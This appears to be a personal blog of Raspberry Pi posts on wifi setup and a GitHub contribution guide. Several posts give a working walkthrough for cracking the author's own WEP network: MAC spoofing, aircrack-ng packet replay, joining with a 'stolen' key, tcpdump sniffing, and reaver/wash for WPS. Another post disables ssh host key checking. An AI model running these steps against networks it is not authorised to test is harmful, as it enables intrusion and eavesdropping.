f-log

Making the wifi settings for WPA2(AES) permanent after getting them working manually.
sudo vi /etc/network/interfaces
and either comment out the WEP lines or just replace everything with
auto lo

iface lo inet loopback
iface eth0 inet dhcp

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
After a reboot the wifi comes up automatically, but a quick side note...
Before I got that to work I tried a '/etc/network/interfaces' file with
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wireless1 inet dhcp
wpa-ssid MYESSID
wpa-psk AREALLYREALLYLONGPSSPHRASENOMAKEITLONGER!
And after a reboot I could run sudo ifup wlan0=wireless1
Which would connect and setup IP from dhcp.
But what ever I tried I could not get it to automatically happen from the '/etc/network/interfaces' file, but I did find others who had simply added sudo ifup wlan0=wireless1 to their start up scripts.
YMMV

All this messing about with my network [1], [2] means that ssh is not happy when I try and connect.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
DE:AD:BE:EF:DE:AD:BE:EF:DE:AD:BE:EF:DE:AD:BE:EF.
Please contact your system administrator.
Add correct host key in /home/user/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/user/.ssh/known_hosts:8
ECDSA host key for 192.168.10.142 has changed and you have requested strict checking.
Host key verification failed.
Which I had seen before when I put a SD card from one Raspberry Pi into another. Quickest way to fix it is to just remove the line for that IP address in the '/home/user/.ssh/known_hosts' file. But doing that every time quickly becomes a pain.
So to fix it long term you can white list the IP address for ssh (I know very insecure).
ssh key changed --
vi ~/.ssh/config
and add these three lines Host 192.168.10.142
    StrictHostKeyChecking no
    UserKnownHostsFile=/dev/null

After switching to WPA2(AES) I was happily surprised to find that all the devices I connected to it just worked, now to get the Pi working...

wpa_passphrase MYESSID AREALLYREALLYLONGPSSPHRASENOMAKEITLONGER!
produces
network={
    ssid="MYESSID"
    #psk="AREALLYREALLYLONGPSSPHRASENOMAKEITLONGER!"
    psk=6c2e62aa8e220a890bafbfbe2aab76e3b600b06a0e451e5b6d49f717461c2d63
}
which you need to add to '/etc/wpa_supplicant/wpa_supplicant.conf'
sudo vi /etc/wpa_supplicant/wpa_supplicant.conf
Now to test the setup run sudo wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant.conf -iwlan0 -d
What is this?
I just got constantly scrolling random messages, not good.
But the wifi dongle light was on indicating it HAD connected.
sudo dhclient wlan0
Gave no response for ages then ended, no error and it killed the dongle light while trying.
Turns out my passphrase is too good! Well it had some special character in it that needed to be treated with double quotes and a backslash escaping the special characters.
No with the fixed config, the test said it had associated and did not scroll sudo wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant.conf -iwlan0 -d
EAPOL: External notification - EAP success=1
EAPOL: SUPP_PAE entering state AUTHENTICATING
EAPOL: SUPP_BE entering state SUCCESS
EAP: EAP entering state DISABLED
EAPOL: SUPP_PAE entering state AUTHENTICATED
EAPOL: Supplicant port status: Authorized
EAPOL: SUPP_BE entering state IDLE
EAPOL authentication completed successfully
Now sudo dhclient wlan0 returns
sudo dhclient wlan0
RTNETLINK answers: File exists
but worked!

Now to make it permanent

Right, to test if your WPA2 router has WPS enabled and is attackable you need reaver-wps.

As this is a continuation of my previous investigations [1],[2] I will assume you already have everything else installed.
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
cd reaver-wps-read-only/src
./configure
make
sudo make install

Once again we need to make sure nothing interferes with the wifi.
sudo /etc/init.d/ifplugd stop
sudo killall ifplugd

Then start up the monitor mode on the device.
sudo airmon-ng start wlan0
and kick off reaver-wps
sudo reaver -i mon0 -b 00:00:DE:AD:BE:EF -A
(where 00:00:DE:AD:BE:EF is the MAC address of the router)
This stated it was Associated and showed the routers ESSID but never did anything.
[CTRL]+c to exit gave the response.
[+] Nothing done, nothing to save.
reaver-wps also comes with 'wash' (previously called 'walsh') that can scan for vulnerable systems.
It was built as part of the package so just run.
sudo wash -i mon0 -C -s
Did take a while but slowly all the access points in my area showed up on the list, minus my own.
Safe!

So after all that fun last time with WEP [1],[2], I immediately changed the router to use WPA2(AES) and started looking for how to crack that.
Well-l-l it seems that WPA2(AES) is just about as secure as you can get without installing an enterprise RADIUS server, with a couple of caveats;
You must use a strong passphrase.
You should ensure the ESSID of the access point is not a dictionary word or one of the 1000 most common ESSIDs.
Your wireless router MUST have WPS disabled.

So I got the first one covered, almost the full possible passphrase length of 63 characters, including special characters, upper/lower case etc.
I decided not to change my ESSID, its not very long but it is also not a dictionary word nor is it in the list ( I also checked another site that had all the ESSIDs recorded for positioning information).
Now the last one is the most worrying. WPS is that special button on your router that allows you to avoid typing in a long password/passphrase for new machines, just press and try and connect quickly enough. There is a tool that will crack that special code rather quickly and once it has that code it can work out your passphrase. And what is worse a large number of routers (read the majority) have an issue that this setting CAN NOT BE TURNED OFF and even if the setting exists and you set it to disabled, its STILL ENABLED.

Luckily my router is so old that is does not have full WPS and so is not vulnerably.
And in the next post I will detail how I confirmed that.

So why the long passphrase?
ANY and I mean ANY sort of encryption CAN be BROKEN with enough time and resources, but if it is going to take an attacker longer than the heat death of the universe to try, then I can live with that.
An attacker can try (as any legitimate device can) to connect with the access point and try a passphrase of 'a' and when that fails 'b' then 'c' and so until they have tried every single characters and then they can, then try 'aa', 'ab' etc in turn until they have tried every possible character combination for every possible key length.
Remember I have YOUR credit card PIN number :)

The passphrase is 'salted' with the ESSID so attackers can not create rainbow tables of precomputed passphrases unless they knew the ESSID in advance, "linksys" <cough>

Last time we made sure we could find a Authenticated MAC address and assign it to our hardware.

Before we go any further set the MAC address to a known client
sudo ifconfig wlan0 hw ether DE:AD:BE:EF:00:00

At his point the target AP runs on channel 6 and has a MAC address of 00:00:DE:AD:BE:EF, the verified MAC address that we have set our wifi dongle to is DE:AD:BE:EF:00:00

sudo apt-get install libssl-dev subversion iw    
For some reason aircrack is not available in the standard packages...
svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng
make
sudo make install
sudo airodump-ng-oui-update

then running
sudo airmon-ng start wlan0
warns us that ifplugd and dhclient might cause interference. Sure enough we try to monitor our target ESSID with
sudo airodump-ng -c 6 --w wep --bssid 00:00:DE:AD:BE:EF mon0
We get nothing, removing the channel (-c) and AP MAC address (--bssid) then we get stuck on the wrong channel.
<snip>Here I remove the hours of things I tried to force the dongle to the right channel.</snip>
sudo airmon-ng stop wlan0
sudo airmon-ng stop mon0
sudo /etc/init.d/ifplugd stop
Stops the daemon from running any new instances but we still need to kill the existing one.
sudo killall ifplugd
sudo airmon-ng start wlan0
sudo airodump-ng -c 6 --w wep --bssid 00:00:DE:AD:BE:EF mon0

This shows the packets being sent to the clients, we have not got a WEP key so we can not decrypt them.
Leave that running and start another shell on the Pi (for me that is just open another console on my main machine and start ssh again, but you can get clever with 'screen' and swap between them).

sudo aireplay-ng -1 900 -o 1 -q 10 -a 00:00:DE:AD:BE:EF -h DE:AD:BE:EF:00:00 mon0
This has now authenticated our connection (even though we still do not have the key)
If you get an error about the channel being wrong, stop both interfaces in the airmon-ng shell and start it again with
sudo airmon-ng start wlan0 6
Now you will either get an Association or it will keep reporting Keep Alive packets. I found I needed those Keep Alives.
Start yet another shell and run
sudo aireplay-ng -3 -b 00:00:DE:AD:BE:EF -h DE:AD:BE:EF:00:00 mon0
This is the clever bit forcing the AP to reissue a specific type of packet with the WEP key encoded in it, when we have enough we can brute force the encrypted value due to some known values.

Right, switching back to the original shell wait for the #Data column to read 30,000 for a 64 bit WEP key and 60,000 for a 128bit WEP key.
For my test I captured 62563 before killing the processes(which took about 5 mins). Each one needed a [CTRL]+C
and stop the monitor interface
sudo airmon-ng stop mon0
ls -larth
shows the last file to be updated as "wep-01.cap", you can ignore the others.
Final step is to decrypt the WEP key

aircrack-ng wep-01.cap
in less than ten seconds I had my Key!

Just for fun I tried aircrack-ng on a much smaller number of packets
18 - Error try 5000+
5295 - Error try 10000+ (after 8mins)
13643 - Key found in less than 1 second.

sudo iwconfig wlan0 essid MYESSID key THEWEPHEXKEY
dhclient wlan0
and we are in, connected with a stolen MAC address and WEP key.

So whats the big deal? Someone can steal my internets? oh noes!

sudo tcpdump -A -i wlan0
shows all the packets flowing over the network and hitting my machine, including everything being done on the wifi!
I started up wifi on my phone and connected to www.jumpstation.co.uk and immediately saw the pages source code zooming up the screen.
Its totally unreadable but proves the point, any non SSL(HTTPS) packets can be seen by ANY client on the network.
That is, any file, any URL, any image, any email, any IM message and so on and so on.

I have been using WEP encryption on my wifi for over ten years for a number of reasons.
It's the easiest form to setup and is compatible on all my different pieces of hardware, not to mention it used to be impossible to get WPA to work on linux
But I am well aware that it can be hacked in minutes/seconds and my hardware requirements to support Wifi has changed dramatically, I am going to move to something stronger than WEP.
Before I make the move I want to see if it really is THAT easy to hack my specific setup.

My AP setup is a non hidden ESSID, with MAC address filtering and obviously, WEP encryption.
For this exercise I will be using the Raspberry PI with a USB wifi dongle with the MAC address already added to the AP MAC filtering, i.e. it all currently works.
What I want to prove is that I can determine another MAC address, use this on my wifi hardware and connect.
Once I have a working MAC address to break the WEP key and connect with the "found" MAC address and WEP key.

ifconfig
shows wlan0 with IP address (and the 'associated' light is on)
lets put a stop to that, bring down the interface.

sudo ifconfig wlan0 down

sudo ifconfig wlan0 hw ether 00:11:22:33:44:55
SIOCSIFHWADDR: Device or resource busy - you may need to down the interface
Grrr I know this was not going to be easy.

sudo service ifplugd stop
(does not kill ssh over ethernet)

sudo ifconfig wlan0 down

do not try some example MAC address such as
sudo ifconfig wlan0 hw ether 01:02:03:04:05:06
You can not use such an address and will get
SIOCSIFHWADDR: Cannot assign requested address
in response, which took me ages to figure out, after all I was copying and pasting an example from the infallible internet

ifconfig
oops where has wlan0 gone(it should just be down, not out) ?

sudo service ifplugd start

ifconfig
its back and has a new MAC address that has no access to my AP due to filtering.

this is not a hardware change and will revert on reboot or unplug/replug.

So I can change my MAC address(tried that a number of years ago and it was a no-go on anything I could get my hands on) next; find a MAC address to clone

sudo apt-get install screen gpsd ncurses-dev libpcap-dev tcpdump
Now we get the self configuring version of kismet
wget http://www.kismetwireless.net/code/kismet-2011-03-R2.tar.gz
tar xfvz kismet-2011-03-R2.tar.gz
cd kismet-2011-03-R2
./configure
make
sudo make install
This will take a while the "make" step alone took 84 mins.
You can ignore all the warnings, we are now ready to rock.
sudo kismet

Say "yes" to the options, including "start server"
Ignore warnings and add wlan0 as the interface("Intf") and "name", no options.
You will be left with a scrolling list of messages, mostly complaining about the lack of GPS.
Press [TAB] and then [ENTER] to close console window and list all the Access Points.

Press [~] to get to the menus.
Now select your AP and select from the menu "View/Clients".
I have a list of the MAC address for clients in the house and I can see the IPAD and Wii are both set as "Wired/AP" and one address I do not recognise that is labelled Unknown, this is the Access Point itself.

At this point we have confirmed that we can spoof a MAC address for the wifi hardware and we have identified MAC addresses that are authorised to connect, next we need the WEP key.

I made a point of noting the channel that the AP is running on and its MAC address, they will come in handy later.

Quit Kismet (selecting Kill when asked)

Next time we will recover the WEP key.

Last time we took the manual steps to connect via WEP, now its time to automate the process.
(I like to use vi/vim)
sudo vi /etc/network/interfaces

dd
until all the lines are gone then
i
and paste in

auto lo

iface lo inet loopback
iface eth0 inet dhcp

auto wlan0
iface wlan0 inet dhcp
wireless-essid UR_ESSID!!!!!
wireless-key UR_KEY!!!!!
wireless-mode managed

#allow-hotplug wlan0
#iface wlan0 inet manual
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

Press [ESC] to enter command mode
move to the UR_ESSID!!!!!
x
repeatedly
then
a
and type in your ESSID
Press [ESC] to enter command mode
move to the UR_KEY!!!!!
x
repeatedly
then
a
and type the hex key for your access point.
Press [ESC] to enter command mode
:wq

sudo shutdown -r now

Once the Pi is back up the Wifi dongle is lit and logging on shows it has an IP address !!

ps auwx
shows no sign of the pesky wpa_cli or wpa_supplicant.

Next I want to see how easy it is to hack my WEP wifi network.

Time to Wifi my Raspberry Pi
Make sure device is plugged in BEFORE powering up the PI, hot plugging killed mine (numerous times, killing the SD card installation, now recovered).

Boot the pi and do the standard update,upgrade and rpi-update.

The release I used was 2013-02-09-wheezy-raspbian
uname -a
Linux raspberrypi 3.6.11+ #427 PREEMPT Fri Apr 26 20:53:06 BST 2013 armv6l GNU/Linux

To find what the wifi adaptor is run
lsusb | grep -i wireless
Mine returns
Bus 001 Device 005: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

Now when I run
ifconfig
it shows wlan0 but no IP address

iwconfig
shows

wlan0     IEEE 802.11bgn ESSID:off/any
         Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
         Retry long limit:7 RTS thr:off Fragment thr:off
         Power Management:on
        
lo        no wireless extensions.

eth0     no wireless extensions.

all ready but not connected to anything.

sudo iwconfig wlan0 essid MYESSID key MYWEPHEXKEY
shows no errors and another
iwconfig shows the ESSID correctly, but running
sudo iwconfig wlan0 essid MYESSID key MYWEPHEXKEY
again removes it!
Something else has control of the Wifi...

sudo killall wpa_cli
sudo killall wpa_supplicant
These two processes are used for non WPA encryption and are not needed for WEP.

now sudo iwconfig wlan0 essid MYESSID key MYWEPHEXKEY
associates with the access point (wifi dongle lights up)
no ip address in ifconfig

so
sudo dhclient wlan0
it LIVES !!

In the next post we will set the Pi up to connect at boot automatically.

So, in my previous post I noted how to contribute on open source using Github and I tried to keep it as brief as possible, this time I would like to expand on each step.
:log in to Github
If you are not logged in you can not 'fork' someone else's project and that is what we are here to do.

:find project you want to help
I am guessing you already know which project you want to help but you can use the search facilities on Github. As well as searching on name you can find projects based on programming language and popularity.

:click "fork"
'Fork' in this case refers to 'fork' in the road. Starting in one place and diverging into multiple. The key to this magic is it allows any changes you make on your 'fork' to be reintegrated based on the fact that the 'fork' took place at a known point in the commit history of the base project.

:clone fork to your local machine
install git and run
git clone https://github.com/MYGITUSERNAME/NAMEOFTHEPROJECT.git
(this command text will be in a text box on the clone page)

This is simply the act of getting a copy of the 'fork' (that may not physically exist anywhere) and creating it on your local machine, ready to be worked on.

:develop locally
do what ever you need to.

Most likely you need to create new code or update existing code, but it could be copying and image file you want to add to the project into the project folders.
Preferably you will use some kind of compiler and or IDE to ensure your changes are "good".

:identify yourself
git config --global user.email "YOUREMAILADDRESS@USEDWITHGITHUB"
git config --global user.name "MYGITUSERNAME"

This is important to allow the changes to be tracked against your account, this is a good thing.

:commit locally
git commit FILETOCOMMIT
seems weird but make sense if you think about it long enough.
In the editor delete all lines, they are just a guide and enter your commit notes.

Why commit locally ? This goes back to the "All things to all people" comment. It is not uncommon to find people using git (not necessarily Github) to version projects solely on their local machine.
Imagine a designer checking in commits each time they add a new component to an image. Later if they need to view an earlier version of the image it is in git (locally). Many other uses including automated backups exist.
So for us its just a log of changes that we have made, the more you remember to commit the more options you will have to roll-back.

:commit to Github
git push origin master
enter log in details

Now we are happy with the local changes we need to store them on the big Github servers in the sky, so everyone can see them.

:Create a pull request
log in to Github
find your project
click "pull" and enter notes that will be read by the project you cloned.

This is the term new git users have the most problem with. By creating a "Pull request" you are sending a message to the original projects owner/s that someone has made some changes to the code base and they should take a look. But they do not HAVE to, or if they look and do not like what they see they can either ignore it or send comments to the submitter. Hopefully they will like what you have proposed, in which case the magic of git will allow them to commit your changes into the Master (base) code base.
There is also one other life your "fork" may have, someone else may "fork" it and so on and so on.

sit back and feel smug.

It is almost always better to fix things than leave them for someone else to fix.

This happened a while back, I just assumed it would be easier by now, how wrong could I be?
Github tries(needs) to be everything to everyone, but what I wanted from it was to make a simple change to an existing project.
So after many hours I finally tracked down what I needed to do to pull this off, it is easy but for some reason no guide, tutorial or blog seems to talk about it like this.

:log in to Github

:find project you want to help

:click "fork"

:clone fork to your local machine
install git and run
git clone https://github.com/MYGITUSERNAME/NAMEOFTHEPROJECT.git
(this command text will be in a text box on the clone page)

:develop locally
do what ever you need to.

:identify yourself
git config --global user.email "YOUREMAILADDRESS@USEDWITHGITHUB"
git config --global user.name "MYGITUSERNAME"

:commit locally
git commit FILETOCOMMIT
seems weird but make sense if you think about it long enough.
In the editor delete all lines, they are just a guide and enter your commit notes.

:commit to Github
git push origin master
enter log in details

:Create a pull request
log in to Github
find your project
click "pull" and enter notes that will be read by the project you cloned.
sit back and feel smug.